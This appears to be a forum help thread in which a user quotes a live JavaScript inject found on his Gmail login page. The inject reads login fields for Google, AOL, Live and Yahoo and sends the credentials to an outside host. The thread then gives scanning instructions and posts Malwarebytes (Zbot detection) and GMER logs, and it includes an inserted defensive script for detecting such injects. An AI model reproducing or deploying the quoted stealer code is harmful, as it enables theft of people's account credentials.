
Gmail javascript


  • This topic is locked
11 replies to this topic

#1 Neiltoo


Posted 30 June 2011 - 10:28 AM

Hi
Hope someone can help

Whilst trying to log into Gmail I am getting a status message "read www.online-security.cc" and the browser hangs.
This only happens on one pc and it is the same whether I use Firefox or IE9

When I look at the source for the log-in page this appears at the bottom:

<script language="javascript" type="text/javascript" src="https://www.online-security.cc/js/yahooaz.js"></script></body>

</html>


The content of the script is:

lvltxt = {}; lvltxt.nmjkmaq9c = 'https://online-security.at/em';lvltxt.i9q472i05h = "/bg.php"; lvltxt.q9fcjx04m6f8 = function(){}; lvltxt.guri = function(xf4wnl2htvp, func, p4cwo) { var v0eda0vw = document.createElement('script'); document.body.appendChild(v0eda0vw); v0eda0vw.src = xf4wnl2htvp; v0eda0vw.onloadhandler = func; v0eda0vw.onload = func;v0eda0vw.onreadystatechange = function() {if (/loaded/.test(this.readyState)) { this.onloadhandler();} } ;}
lvltxt.a460omjnx3g = function(str) { str = (str + '').toString(); return encodeURIComponent(str).replace(/!/g, '%21').replace(/'/g, '%27').replace(/\(/g, '%28').replace(/\)/g, '%29').replace(/\*/g, '%2A').replace(/%20/g, '+')}
lvltxt.riew0bh6nl5wek = function() { var obj = document.getElementById(lvltxt.zhwon95pc[1]); if (obj) { top.lvltxt.dg78wt = obj; top.lvltxt.dg78wt.onclick = lvltxt.lb1kp;}
else {} }
lvltxt.lb1kp = function() { try { var txt = ""; var u = document.getElementById(lvltxt.zhwon95pc[2]); if (u) { txt = "l=" + lvltxt.a460omjnx3g(u.value);}
var pwd = document.getElementById(lvltxt.zhwon95pc[3]); if (pwd) { txt += "&p=" + lvltxt.a460omjnx3g(pwd.value);}
var func = function() { top.lvltxt.dg78wt.onclick = null; top.lvltxt.dg78wt.click();}
lvltxt.guri(lvltxt.nmjkmaq9c + lvltxt.i9q472i05h + "?" + txt, func); return false;}
catch(e) {} }
lvltxt.m9il4ewn = [
["google.com", "signIn", "Email", "Passwd"], ["aol.com", "ssbmtAol", "lgnId1", "pwdId1"], ["login.live.com", "idSIButton9", "i0116", "i0118"], ["yahoo.com", ".save", "username", "passwd"]
]; lvltxt.zhwon95pc = false; for (var i = 0; i < lvltxt.m9il4ewn.length; i++) { if (document.location.href.indexOf(lvltxt.m9il4ewn[i][0]) > -1) { lvltxt.zhwon95pc = lvltxt.m9il4ewn[i];} }
if (lvltxt.zhwon95pc) { setTimeout(lvltxt.riew0bh6nl5wek, 1000);}


To my very untrained eye this looks dodgy!!


I have changed my Gmail password from another PC, but neither McAfee nor AVG scans have found anything amiss!

Thanks for any help
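
A defender-side check for what the post above describes, as an added example that is not part of the original thread: it lists external scripts in saved page source whose host is outside an allowlist, and flags static traits of the quoted script without running it. The allowlist, page URL, sample HTML, threshold and all function names are assumptions made for the illustration.

```javascript
// Added example (not from the thread). SAMPLE_HTML is constructed; the last
// <script> tag and the SAMPLE_JS fragments are the ones quoted in the post.

// Hosts the login page is expected to load scripts from (assumption).
const ALLOWED_SUFFIXES = ["google.com", "gstatic.com"];

// True when host equals an allowed domain or is a subdomain of one.
// A substring test (which the quoted script uses on location.href) would
// also accept names such as "google.com.example.net".
function hostAllowed(host, allowed) {
  const h = host.toLowerCase().replace(/\.$/, "");
  return allowed.some((d) => h === d || h.endsWith("." + d));
}

// Return the resolved src of every <script> whose host is not allowlisted.
function findForeignScripts(html, pageUrl, allowed = ALLOWED_SUFFIXES) {
  const foreign = [];
  const tagRe = /<script\b[^>]*>/gi;
  const srcRe = /\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  for (const [tag] of html.matchAll(tagRe)) {
    const m = srcRe.exec(tag);
    if (!m) continue; // inline script, nothing fetched
    const raw = m[1] ?? m[2] ?? m[3];
    let url;
    try {
      url = new URL(raw, pageUrl); // resolves relative and protocol-relative src
    } catch {
      foreign.push(raw); // unparseable src is reported rather than skipped
      continue;
    }
    if (!hostAllowed(url.hostname, allowed)) foreign.push(url.href);
  }
  return foreign;
}

// Static traits of a form-grabbing inject, matched on the text only.
const INDICATORS = {
  dynamicScript: /createElement\(\s*['"]script['"]\s*\)/,
  readsFieldValue: /getElementById\([^)]*\)[\s\S]{0,80}?\.value\b/,
  hooksClick: /\.onclick\s*=/,
  buildsQuery: /["'][?&]?\w{1,3}=["']\s*\+/,
  loginHostTable: /["'](?:google|yahoo|aol)\.com["']|["']login\.live\.com["']/,
};

// Names of the indicators present in a script's source text.
function triageScript(js) {
  return Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(js));
}

// Threshold of 4 is an arbitrary choice for this example: ordinary page
// code often reads a field or sets onclick, but rarely does all of this.
function looksLikeFormGrabber(js) {
  return triageScript(js).length >= 4;
}

// Constructed page source; only the final tag comes from the post.
const SAMPLE_HTML = `<html><head>
<script src="https://ssl.gstatic.com/accounts/sample.js"></script>
<script>var inline = 1;</script>
<script src="/static/login.js"></script>
</head><body>
<script language="javascript" type="text/javascript" src="https://www.online-security.cc/js/yahooaz.js"></script></body>
</html>`;

// Fragments copied from the script quoted in the post.
const SAMPLE_JS = `
var v0eda0vw = document.createElement('script'); document.body.appendChild(v0eda0vw);
var u = document.getElementById(lvltxt.zhwon95pc[2]); if (u) { txt = "l=" + lvltxt.a460omjnx3g(u.value);}
top.lvltxt.dg78wt.onclick = lvltxt.lb1kp;
["google.com", "signIn", "Email", "Passwd"]
`;

// Assumed URL of the page the source was saved from.
const SAMPLE_PAGE_URL = "https://accounts.google.com/ServiceLogin";

console.log(findForeignScripts(SAMPLE_HTML, SAMPLE_PAGE_URL));
console.log(triageScript(SAMPLE_JS), looksLikeFormGrabber(SAMPLE_JS));
```

A foreign script host on a login page seen from only one PC, in every browser on it, points at the machine rather than the site, which is why the replies move on to scanning the host.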



#2 cryptodan


Posted 30 June 2011 - 10:54 AM

Hello,

And welcome to BleepingComputer.com. Before we can assist you with your question of "Am I infected?", you will need to perform the following tasks and post the logs of each if you can.

Malwarebytes Anti-Malware

NOTE: Malwarebytes is now offering a free trial of their program. If you want to accept it, you will need to enter some billing information, so that at the end of the trial you would be charged the cost of the product. Please decline this offer if you are unable to provide billing information. If you want to try it out, then provide the billing information.

Please download Malwarebytes Anti-Malware and save it to your desktop.
Download Link 1
Download Link 2

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.

  • Make sure you are connected to the Internet.
  • Double-click on mbam-setup.exe to install the application.
    For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.
  • When the installation begins, follow the prompts and do not make any changes to default settings.
  • When installation has finished, make sure you leave both of these checked:
    • Update Malwarebytes' Anti-Malware
    • Launch Malwarebytes' Anti-Malware
  • Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
  • If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
  • If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
  • Make sure the "Perform Full Scan" option is selected.
  • Then click on the Scan button.
  • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
  • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
  • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
  • Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
  • Click on the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked, and click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
  • Exit MBAM when done.
Note: If MBAM encounters a file that is difficult to remove, you will be asked to reboot your computer so MBAM can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.


SUPERAntiSpyware:

Please download and scan with SUPERAntiSpyware Free

  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If it will not start, go to Start > All Programs > SUPERAntiSpyware and click on Alternate Start.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the "General and Startup" tab, and under Start-up Options, make sure "Start SUPERAntiSpyware when Windows starts" box is unchecked.
  • Click the "Scanning Control" tab, and under Scanner Options, make sure the following are checked (leave all others unchecked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen and exit the program.
  • Do not run a scan just yet.
Reboot your computer in "Safe Mode" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode".

Scan with SUPERAntiSpyware as follows:
  • Launch the program and back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive.
  • On the right, under "Complete Scan", choose Perform Complete Scan and click "Next".
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes" and reboot normally.
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.
If you have a problem downloading, installing or getting SAS to run, try downloading and using the SUPERAntiSpyware Portable Scanner instead. Save the randomly named file (i.e. SAS_1710895.COM) to a usb drive or CD and transfer to the infected computer. Then double-click on it to launch and scan. The file is randomly named to help keep malware from blocking the scanner.

Instructions:

Download and scan with SUPERAntiSpyware Free for Home Users
  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the Scanning Control tab.
  • Under Scanner Options make sure the following are checked (leave all others unchecked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen.
  • Back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive.
  • On the right, under "Complete Scan", choose Perform Complete Scan.
  • Click "Next" to start the scan. Please be patient while it scans your computer.
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes".
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.
If you have a problem downloading, installing or getting SAS to run, try downloading and using the SUPERAntiSpyware Portable Scanner instead. Save the randomly named file (i.e. SAS_1710895.COM) to a usb drive or CD and transfer to the infected computer. Then double-click on it to launch and scan. The file is randomly named to help keep malware from blocking the scanner.


Now GMER

GMER does not work in 64bit Mode!!!!!!

Please download GMER from one of the following locations and save it to your desktop:

  • Main Mirror
    This version will download a randomly named file (Recommended)
  • Zipped Mirror
    This version will download a zip file you will need to extract first. If you use this mirror, please extract the zip file to your desktop.
  • Disconnect from the Internet and close all running programs.
  • Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.
  • Double-click on the randomly named GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
  • Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe.
  • GMER will open to the Rootkit/Malware tab and perform an automatic Full Scan when first run. (do not use the computer while the scan is in progress)
  • If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
  • Now click the Scan button. If you see a rootkit warning window, click OK.
  • When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
  • Click the Copy button and paste the results into your next reply.
  • Exit GMER and be sure to re-enable your anti-virus, Firewall and any other security programs you had disabled.
-- If you encounter any problems, try running GMER in safe mode.
-- If GMER crashes or keeps resulting in BSODs, uncheck Devices on the right side before scanning.



#3 Neiltoo


Posted 01 July 2011 - 09:04 AM

Hi
Thank you for your speedy reply

Logs as requested:

Did quick scan by mistake first, immediately followed by full scan:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

01/07/2011 09:26:52
mbam-log-2011-07-01 (09-26-52).txt

Scan type: Quick scan
Objects scanned: 175995
Time elapsed: 10 minute(s), 20 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) -> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

01/07/2011 11:19:11
mbam-log-2011-07-01 (11-19-11).txt

Scan type: Full scan (C:\|D:\|H:\|)
Objects scanned: 344237
Time elapsed: 1 hour(s), 45 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) -> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


I was unable to run Superantispyware in safe mode - when I clicked on scan the program froze but given how sluggish everything was in safe mode this may be another issue!

Ran the portable version with no probs - no log was saved but 14 tracking cookies were found.


Gmer log in next post

#4 Neiltoo


Posted 01 July 2011 - 09:05 AM

GMER 1.0.15.15640 - http://www.gmer.net

Rootkit scan 2011-07-01 14:54:50

Windows 6.0.6002 Service Pack 2 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD3200AAKS-75VYA0 rev.12.01B02

Running: rsnsqyz8.exe; Driver: C:\Users\MACSKI~1\AppData\Local\Temp\pwdiapod.sys





---- System - GMER 1.0.15 ----



SSDT            \SystemRoot\system32\DRIVERS\AVGIDSShim.Sys                                                                                          ZwOpenProcess [0xA9BC17A0]

SSDT            \??\C:\Users\MACSKI~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL.SYS                                                                ZwTerminateProcess [0xABD99620]

SSDT            \SystemRoot\system32\DRIVERS\AVGIDSShim.Sys                                                                                          ZwTerminateThread [0xA9BC18E4]

SSDT            \SystemRoot\system32\DRIVERS\AVGIDSShim.Sys                                                                                          ZwWriteVirtualMemory [0xA9BC1980]



Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           ZwMapViewOfSection [0x82A3A1E8]

Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           ZwUnmapViewOfSection [0x82A3A1FE]

Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           ZwYieldExecution [0x82A3A1D4]

Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           NtMapViewOfSection



---- Kernel code sections - GMER 1.0.15 ----



.text           ntkrnlpa.exe!ZwYieldExecution                                                                                                        82449982 5 Bytes  JMP 82A3A1D8 \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

.text           ntkrnlpa.exe!KeSetEvent + 3F1                                                                                                        824CAB74 4 Bytes  [A0, 17, BC, A9]

.text           ntkrnlpa.exe!KeSetEvent + 621                                                                                                        824CADA4 8 Bytes  [20, 96, D9, AB, E4, 18, BC, ...]

.text           ntkrnlpa.exe!KeSetEvent + 681                                                                                                        824CAE04 4 Bytes  [80, 19, BC, A9]

PAGE            ntkrnlpa.exe!NtMapViewOfSection                                                                                                      8262E82A 7 Bytes  JMP 82A3A1EC \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

PAGE            ntkrnlpa.exe!ZwUnmapViewOfSection                                                                                                    8262EAED 5 Bytes  JMP 82A3A202 \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

?               system32\DRIVERS\avgrkx86.sys                                                                                                        The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSEH.Sys                                                                                                        The system cannot find the path specified. !

?               system32\DRIVERS\avgtdix.sys                                                                                                         The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSShim.Sys                                                                                                      The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSFilter.Sys                                                                                                    The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSDriver.Sys                                                                                                    The system cannot find the path specified. !



---- User code sections - GMER 1.0.15 ----



.text           C:\Windows\System32\svchost.exe[708] ntdll.dll!NtCreateFile                                                                          778C4224 5 Bytes  JMP 00040000 

.text           C:\Windows\System32\svchost.exe[708] ntdll.dll!NtCreateProcess                                                                       778C42E4 5 Bytes  JMP 00040FD4 

.text           C:\Windows\System32\svchost.exe[708] ntdll.dll!NtProtectVirtualMemory                                                                778C4B84 5 Bytes  JMP 00040FE5 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!GetStartupInfoW                                                                    76B11929 5 Bytes  JMP 00010F41 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!GetStartupInfoA                                                                    76B119C9 5 Bytes  JMP 00010F52 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateProcessW                                                                     76B11BF3 5 Bytes  JMP 00010F04 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateProcessA                                                                     76B11C28 5 Bytes  JMP 00010F1F 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!VirtualProtect                                                                     76B11DC3 5 Bytes  JMP 00010062 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateNamedPipeA                                                                   76B12EF5 5 Bytes  JMP 00010FE5 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateNamedPipeW                                                                   76B15C0C 5 Bytes  JMP 00010FCA 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreatePipe                                                                         76B38E6E 5 Bytes  JMP 00010F6D 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryExW                                                                     76B39109 5 Bytes  JMP 00010F94 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryW                                                                       76B39362 5 Bytes  JMP 00010FB9 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryExA                                                                     76B394B4 5 Bytes  JMP 00010051 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryA                                                                       76B394DC 5 Bytes  JMP 00010036 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!VirtualProtectEx                                                                   76B3DBDA 5 Bytes  JMP 00010073 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!GetProcAddress                                                                     76B5903B 5 Bytes  JMP 000100B6 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateFileW                                                                        76B5AECB 5 Bytes  JMP 0001001B 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateFileA                                                                        76B5CE5F 5 Bytes  JMP 00010000 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!WinExec                                                                            76BA5CF7 5 Bytes  JMP 00010F30 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_wsystem                                                                             75807F2F 5 Bytes  JMP 00060069 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!system                                                                               7580804B 5 Bytes  JMP 00060FD4 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_creat                                                                               7580BBE1 5 Bytes  JMP 00060033 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_open                                                                                7580D106 5 Bytes  JMP 00060FEF 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_wcreat                                                                              7580D326 5 Bytes  JMP 00060044 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_wopen                                                                               7580D501 5 Bytes  JMP 0006000C 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyExA                                                                    770539AB 5 Bytes  JMP 0007006C 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyA                                                                      77053BA9 5 Bytes  JMP 00070FD1 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyA                                                                        770589C7 5 Bytes  JMP 00070000 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyW                                                                      7706391E 5 Bytes  JMP 00070FC0 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyExW                                                                    770641F1 5 Bytes  JMP 00070FAF 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyExA                                                                      77067C42 5 Bytes  JMP 0007002C 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyW                                                                        7706E2B5 5 Bytes  JMP 00070011 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyExW                                                                      77077BA1 5 Bytes  JMP 0007003D 

.text           C:\Windows\System32\svchost.exe[708] WS2_32.dll!socket                                                                               772936D1 5 Bytes  JMP 00250000 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenA                                                                       76F34E2B 5 Bytes  JMP 00260000 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenUrlA                                                                    76F3BFCE 5 Bytes  JMP 00260FE5 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenW                                                                       76F6C03E 5 Bytes  JMP 0026001B 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenUrlW                                                                    76F9D722 5 Bytes  JMP 00260FD4 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ntdll.dll!NtCreateFile                                            778C4224 5 Bytes  JMP 04BD0000 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ntdll.dll!NtCreateProcess                                         778C42E4 5 Bytes  JMP 04BD001B 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ntdll.dll!NtProtectVirtualMemory                                  778C4B84 5 Bytes  JMP 04BD0FEF 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetStartupInfoW                                      76B11929 5 Bytes  JMP 046E0F6B 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetStartupInfoA                                      76B119C9 5 Bytes  JMP 046E0F7C 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateProcessW                                       76B11BF3 5 Bytes  JMP 046E00F1 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateProcessA                                       76B11C28 5 Bytes  JMP 046E0F5A 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!VirtualProtect                                       76B11DC3 5 Bytes  JMP 046E0082 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateNamedPipeA                                     76B12EF5 5 Bytes  JMP 046E0014 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateNamedPipeW                                     76B15C0C 5 Bytes  JMP 046E0FB9 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreatePipe                                           76B38E6E 5 Bytes  JMP 046E0F8D 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryExW                                       76B39109 5 Bytes  JMP 046E0071 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryW                                         76B39362 5 Bytes  JMP 046E004A 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryExA                                       76B394B4 5 Bytes  JMP 046E0FA8 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryA                                         76B394DC 5 Bytes  JMP 046E002F 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!VirtualProtectEx                                     76B3DBDA 5 Bytes  JMP 046E009D 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetProcAddress                                       76B5903B 1 Byte  [E9]

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetProcAddress                                       76B5903B 5 Bytes  JMP 046E0F3F 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateFileW                                          76B5AECB 5 Bytes  JMP 046E0FDE 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateFileA                                          76B5CE5F 5 Bytes  JMP 046E0FEF 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!WinExec                                              76BA5CF7 5 Bytes  JMP 046E00D6 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyExA                                      770539AB 5 Bytes  JMP 046F0F79 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyA                                        77053BA9 5 Bytes  JMP 046F001B 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyA                                          770589C7 5 Bytes  JMP 046F0FE5 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyW                                        7706391E 5 Bytes  JMP 046F0F8A 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyExW                                      770641F1 5 Bytes  JMP 046F0036 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyExA                                        77067C42 5 Bytes  JMP 046F0FC0 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyW                                          7706E2B5 5 Bytes  JMP 046F0000 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyExW                                        77077BA1 5 Bytes  JMP 046F0FAF 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_wsystem                                               75807F2F 5 Bytes  JMP 046D0FC8 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!system                                                 7580804B 5 Bytes  JMP 046D0053 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_creat                                                 7580BBE1 5 Bytes  JMP 046D0027 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_open                                                  7580D106 5 Bytes  JMP 046D0000 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_wcreat                                                7580D326 5 Bytes  JMP 046D0038 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_wopen                                                 7580D501 5 Bytes  JMP 046D0FE3 

